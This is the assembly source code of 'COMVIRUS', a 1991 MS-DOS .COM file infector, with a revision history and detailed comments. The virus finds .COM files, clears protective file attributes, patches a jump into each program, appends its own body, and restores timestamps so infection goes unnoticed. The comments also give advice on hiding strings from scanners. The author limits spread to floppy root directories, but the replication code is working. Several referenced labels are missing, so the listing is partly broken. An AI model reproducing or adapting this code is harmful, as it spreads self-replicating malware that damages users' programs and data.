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subttl By Drew Eckhardt
subttl Latest revision: 4-28-1991
;The author of this virus intends it to be used for educational
;purposes only, and assumes no responsibilities for its release,
;dammages resulting from its use, including but not limited to
;equipment dammage or data loss.
;By assembling or examining this program, The user agrees to accept all
;responsibility for this programs use, or any portions of the code
;or concepts contained within. The user also agrees to not publicly release
;this virus, and to exercise necessary precautions to prevent its escape.
;The user accepts all responsibility arising from his actions.
;Don't come crying to me if your hard disk gets infected,
;Revision history:
;4-13: initial bug-free release, size=424 bytes with carrier
;4-15: added no date change support, size=438 bytes with carrier
;4-16: minor documentation changes, size=438 bytes with carrier,
; NO CODE CHANGE from 4-15 revision
;4-21: fixed missing hex h suffixs, made MASM friendly,
; fixed incorrect assume statement (assume statements are ignored
; by A86) enabled hard/floppy infection based on floppy_only status
; size=438 bytes IF floppy_only, 424 bytes if not, with carrier.
; minimum virus length = 419 bytes
;4-23: added control over how many programs are infected per run,
; switched method of infection, from copying to DTA then writing
; to disk to straight write to disk from memory.
; size=412 bytes IF floppy_only, 398 bytes if not, with carrier.
; minimum virus length = 393 bytes
;4-28: used set DTA instead of default DTA/copy command line
; buffer, which had been used based on incorrect assumption
; eliminated calls to get time/date, get attribs
; by using information from find first/find next functions 4eh/4fh
; made warning optional for reduced space if desired. Also
; changed mov reg16, bp add reg16, constant to shorter LEA instruction.
; size=354 bytes IF floppy_only, warning on W/carrier
; 340 bytes IF w/warning & carrier program
; 286 bytes w/o warning, in program
; minimum virus length = 281 bytes for virus itself
;4-28pm: instead of near CALL-pop sequences everywhere, switched to
; a single CALL near ptr Reference_Point, putting the result into
; si now that (until the end) string mode addressing is not used.
; Changed places where a register (used as an index)
; was being loaded THEN added to a single LEA isntruction
; size = 340 bytes if floppy_only, warning on w/carrier
; size = 326 bytes if w/warning & carrier
; size = 272 w/o warning
; minimum virus length = 267 bytes for the virus itself
;4-28pm2: Eliminated unecessary flush buffers call.
; size = 336 bytes if floppy_only w/carrier
; size = 322 bytes w/warning & carrier
; size = 268 w/o warning
; minimum virus length = 263 bytes for virus itself
;4-30: restored 5 bytes of original code at CS:0100
; before infecting other programs, allowing the
; original code field to be modified so one disk write could be
; used instead of two
; minor documentation revisions - corrected incorrect
; opcodes in documentation
; size = 326 bytes if floppy_only w/carrier
; size = 312 bytes w/warning & carrier program
; size = 258 bytes w/carrier program
; Minimum virus length = 253 bytes for the virus itself
;NOTE: The program is currently "set up" for A86 assembly with all
;conditional assembly symbols. #IF and #ENDIF should be replaced with
;MASM IFDEF and ENDIF directives for propper operation.
;Also, instead of using EQUates to define control symbols, the /D
;option or DEFINE could be used.....
;COMVIRUS.ASM must be assembled into a .COM file inorder to function
;properly. For convieniece, I recommend an assembler like A86 that will
;assemble to a .COM file without having to go through LINK and EXE2BIN
;As is, it will infect .COM files located on the current disk.
;ONLY if it is a floppy disk, ONLY in the root directory.
;This is a .COM infector virus, which, does nothing other than print a
;warning message, and spread to all files on the default disk IFF it is
;a floppy disk, in the root directory.
;This is a non - overwriting virus. I took special precautions to preserve
;all functionality of the original program, including command line, parsed FCB,
;and segment register preservation. This makes the virus harder to detect.
;The .COM file is a memory image - with no relocation table. Thus, it
;is an easy target for a virus such as this.
;Infected file format
;jmp near ptr xxxx
;cli cli ;ID bytes
;ORIGINAL program code, sans 5 bytes
;5 bytes ORIGINAL program code
;This format makes infection VERY simple. We merely check for our signature
;(in this case cli cli (fa fa) - instructions that no programmer in his
;right mind would use - loading the original five bytes in the process.
;These original bytes are written to the end of the program, then
;A jump to where the virus is.
;While infection is easy, this method presents some coding problems, as the
;virus does not know where in memory it is. Therefor, When we want to access
;data, we FIND OUT where we are, by performing a near call which PUSHES ip to the
;stack which is then popped. Addresses are then calculated relative to this
;via LEA
;To run the program as normal, command line is restored, registers restored,
;And original code copied onto the first five bytes of the program.
;Program control symbols defined here
floppy_only equ 1
infect_per_run equ 1 ;number of programs infected per run
warn_user equ 1
_TEXT segment byte 'CODE'
assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT
org 100h
Start: jmp infect;
;This is our signature
;Original code is the data field where we store the original program code
;which will replace our signature and jmp to infect
Original_Code: int 20h ;five bytes that simply terminate
nop ;the program
;Data for the virus. In a destructive virus, you would want to encrypt
;any strings using a simple one's complement (not) operation so as to
;thwart detection via text search utilities. Since we want detection to
;be easy, this un-encrypted form is fine.
#IF warn_user
Warning db "This file infected with COMVIRUS 1.0",10,13,'$'
;VirusMask is simply an ASCIIZ terminated string of the files we wish to
VirusMask db '*.COM', 0
push ax ;on entry to a .COM program, STACK:
;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp
;for the two FCB's in here. Save
;I use special trickery to find location of data. Since
;NEAR calls/jmps are RELATIVE, call near ptr find_warn is
;translated to e8 0000 - which will simply place the location
;of Reference onto the stack. Our data can be found relative to
;this point.
call near ptr Reference ;All data is reference realative to
Reference: pop bx ;which is placed into bx for LEA
;bx now contains the REAL address of
;si points to real address of original
;code field
lea si, [bx-(offset Reference - offset Original_Code)]
mov di, 0100h ;original code is at 100h
mov cx, 5 ;5 bytes
cld ;from start of buffer
rep movsb ;do it
mov si, bx ;since BX is used in handle
;based DOS calls, for the remainder
;of the virus, si will contain the
;actual address of reference
#IF warn_user
;Always calculate the address of data relative to known Reference
lea dx, [si-(offset Reference - offset Warning)]
mov ah,9h ;DO dos call, DS:DX pointing
int 21h ;to $ terminated string
;We want to make sure that the user gets the message
mov ah, 0bh ;we will wait for a keypress
int 21h ;signifying the user has
or al, al ;seen the message.
jz WaitForKey
;Since this is a simple demonstration virus, we will only infect
;.COM files on the default drive IFF it is a floppy disk....
;So, we will get information about the disk drive.
push ds ;ds:bx returns a byte to
;media descriptor
mov ah, 1bh ;get disk information STACK
int 21h ;DOIT ax (drive ID's)
cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp
pop ds ;restore ds STACK
jne Floppy ;if it was hard.... ax <--sp
jmp near ptr done ;we're nice guys and are done
Floppy: ;Since it was floppy, we can go on with the infection!
;The default DTA, as is will give us problems. The designers of
;MickeySoft DOS decided to put default DTA at ofset 128 in
;the PSP. PROBLEM: This is also where the user's precious command
;line is, and we MUST remain undectected. SO.... we allocate a
;DTA buffer on the stack. 43 bytes are needed, 44 will do.
sub sp, 44 ;allocate space for findfirst/findnext DTA
mov bp, sp ;set up bp as a reference to this area
;Set the DTA
mov dx, bp ;point DS:DX to our area
mov ah, 1ah ;set DTA
int 21h
;Set up pointers to data in DTA
dta equ word ptr [bp]
file_name equ word ptr [bp+1eh]
attributes equ byte ptr [bp+15h]
time_stamp equ word ptr [bp+16h]
date_stamp equ word ptr [bp+18h]
file_size equ dword ptr [bp+1ah]
;We dynamically allocate a variable to store the number of programs STACK
;The virus has infected. FCB drives
; bp--> 44 byte DTA
infected_count equ byte ptr[bp-2]; Infected_Count
xor ax, ax ;zero variable, sp--> buffer (6 bytes)
push ax ;allocate it on the stack
sub sp, 6 ;allocate small buffer
;Now, we begin looking for files to infect.
lea dx, [si - (offset Reference - offset VirusMask)]
;DS:DX points to the search string STACK
mov ah, 4eh ;find first matching directory entry FCB drives (word)
mov cx, 111b ;only default directory, FILES
;hidden, system and normal
int 21h ;doit bp--> 44 byte DTA buffer
; infected count (word)
jnc Research ;carry is clear when a file was sp--> 6 byte buffer
jmp nofile ;found.
;All handle based DOS calls take a pointer to an ASCIIZ file name in ds:dx
lea dx, file_name
;Since this is a virus, we want to infect files that can't be touched by
;DOS commands, this means readonly, system, and hidden files are at our
;mercy. To do this, we rely on the findfrst/next attributes and other data
;to restore the attribute byte to the original settings. get/SET can fix
;them to be suitable
mov cl, attributes
and cl, 11100000b ;not readonly, system, or hidden STACK
; FCB drives
mov ax, 4301h ;set attributes bp--> buffer (44 bytes)
int 21h ; buffer (6 bytes)
; sp--> infected_count
jnc NoError ;check for error
jmp Restore_Flags
mov ax, 3d02h ;now, open file using handle,
;read/write access
int 21h ;
jnc NoError2 ;IF there was an error, we are done
jmp Restore_Flags ;But we don't need to commit or close
mov bx, ax ;The handle was returned in ACC.
;Howwever, all handle based DOS
;calls expect it in BX
;We don't want to infect the program more than once, so we will
;check to see if it is infected.
mov ax, 4200h ;seek relative to start of file
; bx contains handle from open operation
xor cx,cx ;cx:dx is file pointer
xor dx, dx ;
int 21h ;DOIT
;Now, we will read in enough data to see if we have our virus signature.
mov ah, 3fh ;read data
lea dx, [si-(offset reference-offset original_code)]
;into original_code buffer
mov cx, 5 ;5h bytes
; bx contains handle from last operation
int 21h
cmp word ptr [si-(offset reference-offset original_code)+3], 0fafah
jne GoApe ;if we aren't already infected,
jmp Error ;go for it
;Since it is safe to infect, we will
mov ax, 4202h ;seek end of file
xor cx, cx
xor dx, dx
int 21h
or dx, dx ;check for valid .COM format
jz Less_Than_64K
jmp Error
;Now, we must calculate WHERE the jump will be to. Let's examine the program
;jmp near ptr xxxx
;Cli Cli }These add up to the original length
;Orignal code sans 5 bytes
;Original_Code (5 bytes) }The length of all virus data
;Other virus data is equal to the difference in
;Infect the addresses of Infect and Original_Code
;Thus, the jump must jump TO (offset Infect- offset Original_Code + Original_Length + origin)
;However, in the 80x86, NEAR jumps are calculated as an offset from the position
;of the next statement to execute (because of fetch/execute cycle operation).
;Since jmp near ptr xxxx takes 3 bytes, the next instruction is THREE bytes from
;The 0E9h jmp near instruction, so xxxx will be (offset Infect-Offset Original_Code
;Since AX already contains the original length, we will merely add
;Space for the virus data, and take care of the three bytes
;of code generated by the jmp near instruction.
add ax, (offset Infect - Offset Original_Code -3)
;calculate jump address
mov byte ptr [bp-8], 0e9h ;jmp near instruction
mov word ptr [bp-7], ax ;offset for near jmp
mov word ptr [bp-5], 0fafah ;cli cli
mov ax, 4200h ;seek begining of file
xor cx, cx
mov dx, cx
int 21h
mov ah, 40h ;write patched code
mov cx, 5 ;5 bytes of code
lea dx, [bp-8] ;our buffer
int 21h
mov ax, 4202h ;seek EOF
xor cx, cx
xor dx, dx
int 21h
lea dx, [si - (offset Reference - offset Original_Code)]; set start
mov cx, (offset End_Virus - offset Original_Code) ;set length
mov ah, 40h ;append virus to file
int 21h ;doit
inc infected_Count ;bump up the number of programs infected
Error: mov dx,date_stamp ;restore date
mov cx,time_stamp ;restore time
mov ax, 5701h ;set them
int 21h
mov ah, 3eh ;close file
int 21h
xor ch, ch ;zero hi byte flags
mov cl,attributes ;restore flags
lea dx, file_name ;ds:dx points to ASCIIZ string
;in the buffer, offset 1eh contains
;the file name
mov ax, 4301h ;get/SET flags
int 21h ;Doit
DoAgain:;See if we're done infecting
cmp infected_count, infect_per_run
jae NoFile ;if we're done, same as no new file
mov ah, 4fh ;find next
int 21h
jc NoFile ;if carry is clear, DOIT again!
jmp ReSearch
;Since we have no more files, we will restore things to normal.
mov dx, 80h ;reset default dta at DS:80h
mov ah, 1ah ;set DTA
int 21h
add sp, 52 ;deallocate buffers and infected_count
;Put original code of program BEFORE it was infected back in place!
pop ax ;restore ax
;FUNKY code! In the 80x86, all NEAR or SHORT jmp opcodes take
;a RELATIVE address...... BUT a retn opcode pops a near absolute
;address of the stack - saves us the trouble of some calculating
;relative to here, and the trouble of a self-modifying
;far absolute jmp! (5 bytes)
mov bx, 0100h
push bx
ret ;easiest jump to cs:100
_TEXT ends
end start